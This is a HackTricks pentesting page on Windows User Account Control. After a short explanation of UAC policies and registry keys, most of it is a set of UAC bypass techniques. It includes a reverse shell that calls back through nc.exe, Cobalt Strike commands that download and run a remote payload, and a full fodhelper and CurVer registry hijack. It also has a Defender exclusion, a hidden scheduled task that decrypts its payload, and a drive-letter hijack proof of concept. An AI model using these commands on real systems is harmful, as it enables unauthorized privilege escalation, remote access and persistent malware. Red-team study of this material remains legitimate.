UAC - User Account Control

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

UAC

User Account Control (UAC) is a feature that enables a consent prompt for elevated activities. Applications have different integrity levels, and a program with a high level can perform tasks that could potentially compromise the system. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.

For more info about integrity levels:

Integrity Levels

When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.

This page discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail here. There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:

Policies for installing software on Windows

The local security policies (“secpol.msc” on most systems) are configured by default to prevent non-admin users from performing software installations. This means that even if a non-admin user can download the installer for your software, they won’t be able to run it without an admin account.

Registry Keys to Force UAC to Ask for Elevation

As a standard user with no admin rights, you can make sure the “standard” account is prompted for credentials by UAC when it attempts to perform certain actions. This action would require modifying certain registry keys, for which you need admin permissions, unless there is a UAC bypass, or the attacker is already logged as admin.

Even if the user is in the Administrators group, these changes force the user to re-enter their account credentials in order to perform administrative actions.

The only downside is that this approach needs UAC disabled to work, which is unlikely to be the case in production environments.

The registry keys and entries that you must change are the following (with their default values in parentheses):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
  • ConsentPromptBehaviorUser = 1 (3)
  • ConsentPromptBehaviorAdmin = 1 (5)
  • PromptOnSecureDesktop = 1 (1)

This can also be done manually through the Local Security Policy tool. Once changed, administrative operations prompt the user to re-enter their credentials.

Note

User Account Control is not a security boundary. Therefore, standard users cannot break out of their accounts and gain administrator rights without a local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC Privileges

• Internet Explorer Protected Mode uses integrity checks to prevent high-integrity-level processes (like web browsers) from accessing low-integrity-level data (like the temporary Internet files folder). This is done by running the browser with a low-integrity token. When the browser attempts to access data stored in the low-integrity zone, the operating system checks the integrity level of the process and allows access accordingly. This feature helps prevent remote code execution attacks from gaining access to sensitive data on the system.
• When a user logs on to Windows, the system creates an access token that contains a list of the user’s privileges. Privileges are defined as the combination of a user’s rights and capabilities. The token also contains a list of the user’s credentials, which are credentials that are used to authenticate the user to the computer and to resources on the network.

Autoadminlogon

To configure Windows to automatically log on a specific user at startup, set the AutoAdminLogon registry key. This is useful for kiosk environments or for testing purposes. Use this only on secure systems, as it exposes the password in the registry.

Set the following keys using the Registry Editor or reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
  • AutoAdminLogon = 1
  • DefaultUsername = username
  • DefaultPassword = password

To revert to normal logon behavior, set AutoAdminLogon to 0.

UAC bypass

Tip

Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on “Yes” when the UAC prompt appears

The UAC bypass is needed in the following situation: the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group.

It is important to mention that it is much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).

UAC disabled

If UAC is already disabled (ConsentPromptBehaviorAdmin is 0) you can execute a reverse shell with admin privileges (high integrity level) using something like:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Very Basic UAC “bypass” (full file system access)

If you have a shell with a user that is inside the Administrators group you can mount the C$ shared via SMB (file system) local in a new disk and you will have access to everything inside the file system (even Administrator home folder).

Warning

Looks like this trick isn’t working anymore

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass with cobalt strike

The Cobalt Strike techniques will only work if UAC is not set at it’s max security level

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire and Metasploit also have several modules to bypass the UAC.

KRBUACBypass

Documentation and tool in https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME which is a compilation of several UAC bypass exploits. Note that you will need to compile UACME using visual studio or msbuild. The compilation will create several executables (like Source\Akagi\outout\x64\Debug\Akagi.exe) , you will need to know which one you need.
You should be careful because some bypasses will promtp some other programs that will alert the user that something is happening.

UACME has the build version from which each technique started working. You can search for a technique affecting your versions:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Also, using this page you get the Windows release 1607 from the build versions.

UAC Bypass – fodhelper.exe (Registry hijack)

The trusted binary fodhelper.exe is auto-elevated on modern Windows. When launched, it queries the per-user registry path below without validating the DelegateExecute verb. Planting a command there allows a Medium Integrity process (user is in Administrators) to spawn a High Integrity process without a UAC prompt.

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

# Optional: from a 32-bit shell on 64-bit Windows, spawn a 64-bit PowerShell for stability
C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell -nop -w hidden -c "$PSVersionTable.PSEdition"

# 1) Create the vulnerable key and values
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null

# 2) Set default command to your payload (example: reverse shell or cmd)
# Replace <BASE64_PS> with your base64-encoded PowerShell (or any command)
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -e <BASE64_PS>" -Force

# 3) Trigger auto-elevation
Start-Process -FilePath "C:\\Windows\\System32\\fodhelper.exe"

# 4) (Recommended) Cleanup
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open" -Recurse -Force

CurVer/extension hijack variant (HKCU only)

Recent samples abusing fodhelper.exe avoid DelegateExecute and instead redirect the ms-settings ProgID via the per-user CurVer value. The auto-elevated binary still resolves the handler under HKCU, so no admin token is needed to plant the keys:

# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

Once elevated, malware commonly disables future prompts by setting HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0, then performs additional defense evasion (e.g., Add-MpPreference -ExclusionPath C:\ProgramData) and recreates persistence to run as high integrity. A typical persistence task stores an XOR-encrypted PowerShell script on disk and decodes/executes it in-memory each hour:

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

This variant still cleans up the dropper and leaves only the staged payloads, making detection rely on monitoring the CurVer hijack, ConsentPromptBehaviorAdmin tampering, Defender exclusion creation, or scheduled tasks that in-memory decrypt PowerShell.

More UAC bypass

All the techniques used here to bypass AUC require a full interactive shell with the victim (a common nc.exe shell is not enough).

You can get using a meterpreter session. Migrate to a process that has the Session value equals to 1:

(explorer.exe should works)

UAC Bypass with GUI

If you have access to a GUI you can just accept the UAC prompt when you get it, you don’t really need a bypass it. So, getting access to a GUI will allow you to bypass the UAC.

Moreover, if you get a GUI session that someone was using (potentially via RDP) there are some tools that will be running as administrator from where you could run a cmd for example as admin directly without being prompted again by UAC like https://github.com/oski02/UAC-GUI-Bypass-appverif. This might be a bit more stealthy.

Noisy brute-force UAC bypass

If you don’t care about being noisy you could always run something like https://github.com/Chainski/ForceAdmin that ask to elevate permissions until the user does accepts it.

Your own bypass - Basic UAC bypass methodology

If you take a look to UACME you will note that most UAC bypasses abuse a Dll Hijacking vulnerability (mainly writing the malicious dll on C:\Windows\System32). Read this to learn how to find a Dll Hijacking vulnerability.

1. Find a binary that will autoelevate (check that when it is executed it runs in a high integrity level).
2. With procmon find “NAME NOT FOUND” events that can be vulnerable to DLL Hijacking.
3. You probably will need to write the DLL inside some protected paths (like C:\Windows\System32) were you don’t have writing permissions. You can bypass this using:
   1. wusa.exe: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
   2. IFileOperation: Windows 10.
4. Prepare a script to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.

Another UAC bypass technique

Consists on watching if an autoElevated binary tries to read from the registry the name/path of a binary or command to be executed (this is more interesting if the binary searches this information inside the HKCU).

Administrator Protection (25H2) drive-letter hijack via per-logon-session DOS device map

Windows 11 25H2 “Administrator Protection” uses shadow-admin tokens with per-session \Sessions\0\DosDevices/<LUID> maps. The directory is created lazily by SeGetTokenDeviceMap on first \?? resolution. If the attacker impersonates the shadow-admin token only at SecurityIdentification, the directory is created with the attacker as owner (inherits CREATOR OWNER), allowing drive-letter links that take precedence over \GLOBAL??.

Steps:

1. From a low-privileged session, call RAiProcessRunOnce to spawn a promptless shadow-admin runonce.exe.
2. Duplicate its primary token to an identification token and impersonate it while opening \?? to force creation of \Sessions\0\DosDevices/<LUID> under attacker ownership.
3. Create a C: symlink there pointing to attacker-controlled storage; subsequent filesystem accesses in that session resolve C: to the attacker path, enabling DLL/file hijack without a prompt.

PowerShell PoC (NtObjectManager):

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"

References

• HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf) – fodhelper UAC bypass steps
• LOLBAS: Fodhelper.exe
• Microsoft Docs – How User Account Control works
• UACME – UAC bypass techniques collection
• Checkpoint Research – KONNI Adopts AI to Generate PowerShell Backdoors
• Project Zero – Windows Administrator Protection drive-letter hijack

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.